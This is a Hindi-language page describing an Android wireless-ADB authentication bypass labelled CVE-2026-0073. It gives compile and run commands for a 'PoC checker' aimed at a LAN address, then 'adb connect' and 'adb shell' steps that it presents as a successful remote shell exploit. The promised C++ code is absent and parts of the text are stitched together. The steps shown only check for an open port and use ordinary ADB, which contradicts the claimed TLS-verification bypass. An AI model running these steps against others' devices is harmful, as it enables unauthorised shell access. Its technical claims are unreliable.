
CVE-2026-0073
CVE-2026-0073 एंड्रॉइड के वायरलेस ADB (adbd डेमन) में एक गंभीर प्रमाणीकरण बाईपास भेद्यता है।
समान नेटवर्क पर मौजूद एक हमलावर पारस्परिक TLS प्रमाणीकरण को बाईपास कर सकता है और उपयोगकर्ता की अनुमति या पिछली पेयरिंग के बिना डिवाइस से कनेक्ट हो सकता है।
| आइटम | विवरण |
|---|---|
| CVE ID | CVE-2026-0073 |
| गंभीरता | गंभीर |
| CVSS स्कोर | 8.8 |
| प्रभावित घटक | adbd (Android Debug Bridge) - TLS हैंडलर |
| प्रकार | प्रमाणीकरण बाईपास |
| प्रभाव | रिमोट शेल एक्सेस (shell उपयोगकर्ता) |
| पैच किया गया | मई 2026 Android सुरक्षा बुलेटिन |
इसमें ठीक किया गया: सुरक्षा पैच स्तर 2026-05-01 और उसके बाद।
shell उपयोगकर्ता के रूप में कमांड चला सकता हैadbd_tls_verify_cert() में तर्क दोष का शोषण करके काम करता हैयह त्रुटि इसलिए होती है क्योंकि फ़ाइल CVE-2026-0073-Checker.cpp अभी तक मौजूद नहीं है।
nano CVE-2026-0073-Checker.cpp
नीचे दिए गए पूरे कोड को एडिटर में कॉपी और पेस्ट करें:
सेव करें और बाहर निकलें (Ctrl + X → Y → Enter)
फिर से कंपाइल करें:
g++ -o CVE-2026-0073 CVE-2026-0073-Checker.cpp -lssl -lcrypto -Wall -O2
./CVE-2026-0073 192.168.1.105
यहाँ ठीक वही दिखाया गया है जो आप देखेंगे यदि C++ प्रोग्राम किसी भेद्य Android डिवाइस पर सफलतापूर्वक काम करता है:
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0073 PoC Checker ║
║ Android Wireless ADB Authentication Bypass ║
╚══════════════════════════════════════════════════════════════╝
Target : 192.168.1.105
[*] Checking 192.168.1.105:5555 → OPEN
[!] Wireless ADB Port is Open!
[!] High chance of being vulnerable to CVE-2026-0073
Next Steps:
1. adb connect 192.168.1.105:5555
2. adb shell
OPEN हरे रंग में → ADB पोर्ट सुन रहा है।ये कमांड चलाएँ:
adb connect 192.168.1.105:5555
यदि यह दिखाता है:
connected to 192.168.1.105:5555
फिर टाइप करें:
adb shell
आपको डिवाइस के अंदर पहुँच जाना चाहिए:
pixel8:/ $
यह पूर्ण सफल शोषण है।
यह PoC केवल शैक्षिक और अधिकृत परीक्षण के लिए है।
आप इस टूल का उपयोग केवल उन डिवाइसों पर कर सकते हैं जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है। अनधिकृत उपयोग अवैध है और सख्त रूप से निषिद्ध है।
अपने जोखिम पर उपयोग करें। लेखक किसी भी क्षति या कानूनी परिणामों के लिए ज़िम्मेदार नहीं है।
🎯 सावधानी के साथ बनाया गया — केवल अधिकृत डिवाइसों पर उपयोग करें।